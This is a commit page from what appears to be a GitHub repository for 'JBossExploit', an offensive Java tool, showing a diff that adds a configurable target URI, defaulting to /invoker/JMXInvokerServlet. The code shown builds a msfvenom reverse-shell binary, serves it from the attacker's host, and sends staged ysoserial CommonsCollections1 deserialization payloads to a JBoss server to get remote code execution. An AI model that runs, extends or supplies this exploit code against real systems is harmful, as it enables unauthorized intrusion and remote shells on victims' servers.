allow specification of URI path, defaults to /invoker/JMXInvokerServlet

njfox · Nov 18, 2015 · bdb1903 · bdb1903
1 parent 0730c73
commit bdb1903
Show file tree

Hide file tree

Showing 4 changed files with 20 additions and 7 deletions.
diff --git a/README.md b/README.md
@@ -23,16 +23,17 @@ are not responsible or liable for misuse of the software. Use responsibly.
 ## Usage
 
 ```shell
-$ java -jar JBossExploit.jar -help
+$ java -jar JBossExploit.jar
 usage: java -jar JBossExploit.jar -lhost <host> -lport <port> -rhost
-            <host> -rport <port> -srvport <port>
+            <host> -rport <port> -srvport <port> -uripath <uri>
  -help             print this message
  -lhost <host>     IP Address of Attacking Machine
  -lport <port>     Port on which local handler is listening for a reverse
                    TCP shell
  -rhost <host>     Target Hostname or IP Address
  -rport <port>     Remote JBoss Port
  -srvport <port>   Port for local HTTP server
+ -uripath <uri>    Target resource URI (Default: /invoker/JMXInvokerServlet)
 ```
 
 ## Examples

diff --git a/src/main/java/jbossexploit/Cli.java b/src/main/java/jbossexploit/Cli.java
@@ -33,6 +33,12 @@ public static org.apache.commons.cli.CommandLine parseArguments(String[] args) {
                 .withDescription("Port for local HTTP server")
                 .create("srvport");
 
+        Option uripath = OptionBuilder.withArgName("uri")
+                .hasArg()
+                .withDescription("Target resource URI (Default: /invoker/JMXInvokerServlet)")
+                .isRequired(false)
+                .create("uripath");
+
         Options options = new Options();
 
         options.addOption(help);
@@ -41,6 +47,7 @@ public static org.apache.commons.cli.CommandLine parseArguments(String[] args) {
         options.addOption(lhost);
         options.addOption(lport);
         options.addOption(srvport);
+        options.addOption(uripath);
 
         CommandLineParser parser = new DefaultParser();
         org.apache.commons.cli.CommandLine cmd = null;
@@ -53,8 +60,8 @@ public static org.apache.commons.cli.CommandLine parseArguments(String[] args) {
 
         if (cmd.hasOption("help") || args.length == 0) {
             HelpFormatter formatter = new HelpFormatter();
-            formatter.printHelp("java -jar JBossExploit.jar -lhost <host> -lport <port> -rhost <host> -rport <port> -srvport <port>",
-                    options);
+            formatter.printHelp("java -jar JBossExploit.jar -lhost <host> -lport <port> -rhost <host> -rport <port> -srvport <port>"
+                    + " -uripath <uri>", options);
             System.exit(0);
         }
 

diff --git a/src/main/java/jbossexploit/Main.java b/src/main/java/jbossexploit/Main.java
@@ -16,6 +16,11 @@ public static void main(String[] args) {
         String lhost = cmd.getOptionValue("lhost");
         int lport = Integer.parseInt(cmd.getOptionValue("lport"));
         int srvport = Integer.parseInt(cmd.getOptionValue("srvport"));
+        String uripath = cmd.getOptionValue("uripath");
+        // If URI isn't specified, set it to /invoker/JMXInvokerServlet
+        if (uripath == null) {
+            uripath = "/invoker/JMXInvokerServlet";
+        }
 
         System.out.println("Generating reverse shell binary with msfvenom at /tmp/" + binaryName + "...");
         Msfvenom.generateBinary(lhost, lport, binaryName);
@@ -27,7 +32,7 @@ public static void main(String[] args) {
         int stage;
         for (stage = 0; stage < 3; stage++) {
             System.out.println("Sending stage " + stage);
-            Stager.sendPayload(stage, rhost, rport, lhost, srvport, binaryName);
+            Stager.sendPayload(stage, rhost, rport, lhost, srvport, binaryName, uripath);
         }
     }
 

diff --git a/src/main/java/jbossexploit/Stager.java b/src/main/java/jbossexploit/Stager.java
@@ -13,7 +13,7 @@
 
 public class Stager {
 
-    public static void sendPayload(int stage, String rhost, int rport, String lhost, int srvport, String binaryName) {
+    public static void sendPayload(int stage, String rhost, int rport, String lhost, int srvport, String binaryName, String uripath) {
         // TODO: Add support for the other vulnerable libraries, e.g. Groovy
         ysoserial.GeneratePayload ysoserial = new ysoserial.GeneratePayload();
         String command = null;
@@ -37,7 +37,7 @@ public static void sendPayload(int stage, String rhost, int rport, String lhost,
         Object payload = ysoserial.generate("CommonsCollections1", command);
 
 
-        String url = "http://" + rhost + ":" + rport + "/invoker/JMXInvokerServlet";
+        String url = "http://" + rhost + ":" + rport + uripath;
 
         DefaultHttpClient httpClient = new DefaultHttpClient();